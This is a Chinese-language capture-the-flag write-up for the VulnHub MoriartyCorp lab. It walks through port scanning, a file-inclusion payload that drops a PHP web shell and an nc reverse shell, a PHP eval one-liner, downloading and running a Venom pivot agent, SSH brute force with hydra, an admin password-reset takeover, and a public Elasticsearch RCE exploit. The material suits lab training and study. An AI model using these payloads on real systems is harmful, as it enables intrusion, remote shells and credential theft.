VulnHub-MoriartyCorp

总字符数: 19.68K

代码: 14.71K, 文本: 1.20K

预计阅读时间: 1.15 小时

Overview

Name	Template
Release Date	2024-11-09
Write-up Author	kill3r
Machine Author	kill3r
Difficulty	Medium
User Flag
Root Flag
Link	https://www.vulnhub.com/entry/boredhackerblog-moriarty-corp,456/

描述

作为一名特工,协助调查世界最大军火商的非法交易!
靶场共分6个任务,每完成一个任务并提交Flag,开启下一个任务
Web面板位于端口8000（不在范围内。请勿攻击）
标志以#_flag.txt格式存储。标志以 flag{} 格式输入。它们通常存储在 / 目录中，但可以位于不同的位置。
当您添加标志时，Web 应用程序会在后台启动 docker 容器。关闭并重新启动会弄乱它。

涉及的任务：

端口扫描
webapp 攻击和 bug 搜寻
旋转（强烈推荐meterpreter）
密码猜测/暴力破解

Nmap扫描

ports=$(nmap -p- --min-rate=1000 -T4 192.168.56.100 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
nmap -p$ports -sV -sC -O 192.168.56.100 -oN nmap.txt
# 第一行代码使用nmap命令扫描本地主机的所有端口（从1到65535），--min-rate=1000参数表示每秒发送最少1000个包，-T4参数表示设置扫描速度为快速扫描模式。
# grep -oE '(^[0-9][^/tcp]*)'用于提取输出结果中的端口号，tr '\n' ','用于将提取的端口号按逗号分隔并拼接成一个字符串。
# 第二行代码使用nmap命令再次扫描指定的端口，-p$ports参数表示扫描之前提取的端口列表，-sV参数表示进行服务版本检测，-sC参数表示在扫描过程中使用默认脚本进行常见漏洞探测，-O参数表示进行操作系统版本检测，-oN nmap.txt参数表示将扫描结果保存到名为nmap.txt的文件中。

┌──(root㉿kill3r)-[/home/kill3r]
└─# ports=$(nmap -p- --min-rate=1000 -T4 192.168.56.100 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')                                                
┌──(root㉿kill3r)-[/home/kill3r]
└─# nmap -p$ports -sV -sC -O 192.168.56.100 -oN nmap.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 10:01 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.104
Host is up (0.00054s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5a:a7:c8:64:2a:54:bc:64:48:16:2b:79:64:69:cc:45 (RSA)
|   256 89:8d:6a:9b:44:e3:f1:f1:ef:8c:23:13:7a:84:fc:71 (ECDSA)
|_  256 1d:e6:68:27:52:5b:6d:0d:67:5d:30:4c:03:68:b3:2a (ED25519)
8000/tcp open  http    Werkzeug httpd 0.14.1 (Python 2.7.15rc1)
|_http-server-header: Werkzeug/0.14.1 Python/2.7.15rc1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
9000/tcp open  http    Portainer Docker UI 1.19.2
|_http-title: Portainer
MAC Address: 08:00:27:C8:E8:21 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.54 ms 192.168.56.104

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds

枚举

SMB 枚举

Port: 139 389 445 636

enum4linux -a/-A 127.0.0.1

1	$ enum4linux -A <ip>

MSF-SMB

# 基于SMB协议扫描版本号
msf6 > use auxiliary/scanner/smb/smb_version
# 扫描共享文件
msf6 > use auxiliary/scanner/smb/smb_enumshares
# 基于SMB进行用户信息枚举
msf6 > use auxiliary/scanner/smb/smb_lookupsid

Web

HTTP Web Server, Port Like: 80 443 81 8080 8443 4443 8081

Finger:获取有关特定用户或系统上的用户列表和配置信息

`whatweb`

# 用于识别和分析目标网站的技术栈、CMS（内容管理系统）、插件、框架和其他与网站相关的信息。通过分析网站的响应和页面内容
┌──(root㉿kill3r)-[~]
└─# whatweb 192.168.56.100
http://192.168.56.100 [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.46 (Debian)], IP[192.168.56.100], Script[text/javascript]

dirb http://192.168.56.100

dirsearch -u http://192.168.56.100 -r

gobuster dir -w ... -u http://192.168.56.100 -x html,php,js,bak

┌──(root㉿kill3r)-[~]
└─# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -u http://192.168.56.100 -x html,php,js,bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.100
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,php,js,bak
[+] Timeout:                 10s
===============================================================
2023/08/03 22:01:51 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 1620]
/profile.php          (Status: 200) [Size: 1473]
/javascript.js        (Status: 200) [Size: 0]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.100/javascript/]                                       
/exploit.html         (Status: 200) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1099312 / 1102805 (99.68%)===============================================================
2023/08/03 22:03:22 Finished
===============================================================

漏洞扫描

1 2	$ nikto -h http://www.example.com/ $ nuclei -u https://example.com/

复现过程

在8000端口输入flag{start}开启关卡

关卡一

访问80端口

两个页面只有文件名不同,下意识文件包含Kali监听nc -lvvp 6666

1
2

# 文件包含中data协议直接反弹shell
data%3A//text/plain%3Bbase64%2CPD9waHAgJHZhcj1zaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7Pz4%3D&cmd=rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f%7C/bin/sh+2>%261%7Cnc+192.168.56.102+6666+%3E/tmp/f

1
2
3

id
cd /
cat 1_flag.txt

1	flag{the_game_is_on}

提交第一关Flag进行下一关

关卡二

┌──(root㉿kill3r)-[/opt/proxy/Venom]
└─# ls
admin.exe        admin_linux_x86  agent_arm_eabi5  agent_linux_x64  agent_macos_x64        changelog
admin_linux_x64  admin_macos_x64  agent.exe        agent_linux_x86  agent_mipsel_version1  scripts
                                                                                                                 
┌──(root㉿kill3r)-[/opt/proxy/Venom]
└─# python3 -m http.server 80                                 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

# 靶机
cd /tmp
wget http://192.168.56.102/agent_linux_x64
chmod +x agent_linux_x64


# attack
┌──(root㉿kill3r)-[/opt/proxy/Venom]
└─# chmod +x admin_linux_x64 
                                                                                                         
┌──(root㉿kill3r)-[/opt/proxy/Venom]
└─# ./admin_linux_x64 -lport 9999

# 靶机
./agent_linux_x64 -rhost 192.168.56.102 -rport 9999
2023/09/09 08:43:12 [+]Successfully connects to a new node

(admin node) >>> show 
A
+ -- 1
(admin node) >>> (admin node) >>> goto 1
node 1
(node 1) >>> socks 9090
a socks5 proxy of the target node has started up on the local port 9090.

# 使用proxychains4
vim /etc/proxychains4.conf
socks5 127.0.0.1 9090

┌──(root㉿kill3r)-[/opt/lan]
└─# proxychains4 nmap 172.17.0.0/24 -sV  -sT -Pn -p80
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 17:21 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.1:80  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.2:80 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.3:80  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.4:80  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.7:80 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.10:80 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.13:80 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.16:80

发现了172.17.0.4:80使用代理打开浏览器proxychains4 firefox访问

发现需要密码,那就是用Burp爆破,但是浏览器设置了burp的代理端口就无法设置,socks,所以我们可以使用burp的二级代理模式

正常使用,此时使用一句话木马<?php @eval($_POST['a']);?>选择webshell,然后随便输入一个密码点击拦截后提交,

发送到爆破模块,对密码设置变量,选中一个字典后开始攻击

蚁剑设置代理

拿到flag

1	flag{picture_is_worth_1000_words}

关卡三(HASH碰撞)

发现一堆账号和加密后的密码,密码像是md5

┌──(root㉿kill3r)-[/home/kill3r]
└─# hash-identifier 63a9f0ea7bb98050796b649e85481845
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

发现是MD5,使用在线网站破解

root
toor
password
admin
guest
MORIARTY
MCORP
mcorp
weapons
moriarty

把账号和密码分别写到txt中,扫描开放22端口的机器,并使用hydra暴力破解

┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# proxychains4 nmap 172.17.0.0/24 -sV  -sT -Pn -p22
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 19:05 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.1:22  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.2:22 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.3:22 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.4:22 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.5:22  ...  OK

┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# proxychains4 hydra -L admin -P password 172.17.0.5 ssh

1
2
3

[22][ssh] host: 172.17.0.5   login: root   password: weapons
┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# proxychains4 ssh root@172.17.0.5

1	flag{what_weapons}

关卡四

账号密码告诉我们了,提示可能在这几个端口上,那么重点扫描这几个端口

1 2	┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp] └─# proxychains4 nmap 172.17.0.0/24 -sV -sT -Pn -p443,8000,8080,8888

扫了半年可算扫完了

输入账号密码

好像是一个聊天室,有聊天和修改密码功能

发现一个用户:admin,接着查看修改密码功能看看有没有任意密码修改

盲猜没有进行鉴权,把usernaem改成admin试一下,好像成功了,用无痕登录一下

登录成功,并且发现flag

1	flag{on_the_move}

关卡五

提示我们有一个Elasticsearch

1 2	┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp] └─# proxychains4 nmap 172.17.0.0/24 -sV -sT -Pn -p9200

# 版本1.4.2
┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# searchsploit elasticsearch         
-------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title                                                                                          |  Path
-------------------------------------------------------------------------------------------------------- ---------------------------------
ElasticSearch - Remote Code Execution                                                                   | linux/remote/36337.py
ElasticSearch - Remote Code Execution                                                                   | multiple/webapps/33370.html
ElasticSearch - Search Groovy Sandbox Bypass (Metasploit)                                               | java/remote/36415.rb
ElasticSearch 1.6.0 - Arbitrary File Download                                                           | linux/webapps/38383.py
ElasticSearch 7.13.3 - Memory disclosure                                                                | multiple/webapps/50149.py
ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal                                                   | php/webapps/37054.py
ElasticSearch Dynamic Script - Arbitrary Java Execution (Metasploit)                                    | java/remote/33588.rb
Elasticsearch ECE 7.13.3 - Anonymous Database Dump                                                      | multiple/webapps/50152.py
-------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results
Papers: No Results

# 先尝试RCE
┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# searchsploit elasticsearch -m 36337.py
[!] Could not find EDB-ID #


  Exploit: ElasticSearch - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/36337
     Path: /usr/share/exploitdb/exploits/linux/remote/36337.py
    Codes: CVE-2015-1427, OSVDB-118239
 Verified: True
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /opt/vulnhub/MoriartyCorp/36337.py

┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# python2 36337.py                          

▓█████  ██▓    ▄▄▄        ██████ ▄▄▄█████▓ ██▓ ▄████▄    ██████  ██░ ██ ▓█████  ██▓     ██▓
▓█   ▀ ▓██▒   ▒████▄    ▒██    ▒ ▓  ██▒ ▓▒▓██▒▒██▀ ▀█  ▒██    ▒ ▓██░ ██▒▓█   ▀ ▓██▒    ▓██▒
▒███   ▒██░   ▒██  ▀█▄  ░ ▓██▄   ▒ ▓██░ ▒░▒██▒▒▓█    ▄ ░ ▓██▄   ▒██▀▀██░▒███   ▒██░    ▒██░
▒▓█  ▄ ▒██░   ░██▄▄▄▄██   ▒   ██▒░ ▓██▓ ░ ░██░▒▓▓▄ ▄██▒  ▒   ██▒░▓█ ░██ ▒▓█  ▄ ▒██░    ▒██░
░▒████▒░██████▒▓█   ▓██▒▒██████▒▒  ▒██▒ ░ ░██░▒ ▓███▀ ░▒██████▒▒░▓█▒░██▓░▒████▒░██████▒░██████▒
░░ ▒░ ░░ ▒░▓  ░▒▒   ▓▒█░▒ ▒▓▒ ▒ ░  ▒ ░░   ░▓  ░ ░▒ ▒  ░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓  ░░ ▒░▓  ░
 ░ ░  ░░ ░ ▒  ░ ▒   ▒▒ ░░ ░▒  ░ ░    ░     ▒ ░  ░  ▒   ░ ░▒  ░ ░ ▒ ░▒░ ░ ░ ░  ░░ ░ ▒  ░░ ░ ▒  ░
   ░     ░ ░    ░   ▒   ░  ░  ░    ░       ▒ ░░        ░  ░  ░   ░  ░░ ░   ░     ░ ░     ░ ░
   ░  ░    ░  ░     ░  ░      ░            ░  ░ ░            ░   ░  ░  ░   ░  ░    ░  ░    ░  ░
                                              ░
 Exploit for ElasticSearch , CVE-2015-1427   Version: 20150309.1
Use: 36337.py target


# 直接跟IP地址即可
┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# proxychains4 python2 36337.py 172.17.0.7
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16

▓█████  ██▓    ▄▄▄        ██████ ▄▄▄█████▓ ██▓ ▄████▄    ██████  ██░ ██ ▓█████  ██▓     ██▓
▓█   ▀ ▓██▒   ▒████▄    ▒██    ▒ ▓  ██▒ ▓▒▓██▒▒██▀ ▀█  ▒██    ▒ ▓██░ ██▒▓█   ▀ ▓██▒    ▓██▒
▒███   ▒██░   ▒██  ▀█▄  ░ ▓██▄   ▒ ▓██░ ▒░▒██▒▒▓█    ▄ ░ ▓██▄   ▒██▀▀██░▒███   ▒██░    ▒██░
▒▓█  ▄ ▒██░   ░██▄▄▄▄██   ▒   ██▒░ ▓██▓ ░ ░██░▒▓▓▄ ▄██▒  ▒   ██▒░▓█ ░██ ▒▓█  ▄ ▒██░    ▒██░
░▒████▒░██████▒▓█   ▓██▒▒██████▒▒  ▒██▒ ░ ░██░▒ ▓███▀ ░▒██████▒▒░▓█▒░██▓░▒████▒░██████▒░██████▒
░░ ▒░ ░░ ▒░▓  ░▒▒   ▓▒█░▒ ▒▓▒ ▒ ░  ▒ ░░   ░▓  ░ ░▒ ▒  ░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓  ░░ ▒░▓  ░
 ░ ░  ░░ ░ ▒  ░ ▒   ▒▒ ░░ ░▒  ░ ░    ░     ▒ ░  ░  ▒   ░ ░▒  ░ ░ ▒ ░▒░ ░ ░ ░  ░░ ░ ▒  ░░ ░ ▒  ░
   ░     ░ ░    ░   ▒   ░  ░  ░    ░       ▒ ░░        ░  ░  ░   ░  ░░ ░   ░     ░ ░     ░ ░
   ░  ░    ░  ░     ░  ░      ░            ░  ░ ░            ░   ░  ░  ░   ░  ░    ░  ░    ░  ░
                                              ░
 Exploit for ElasticSearch , CVE-2015-1427   Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ ls
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.7:9200  ...  OK
6_flag.txt
bin
boot
buyers.txt
dev
elasticsearch
elasticsearch-1.4.2.tar.gz
etc
home
lib
lib64
main.sh
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
~$ cat 6_flag.txt
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.7:9200  ...  OK
flag{game_over}
~$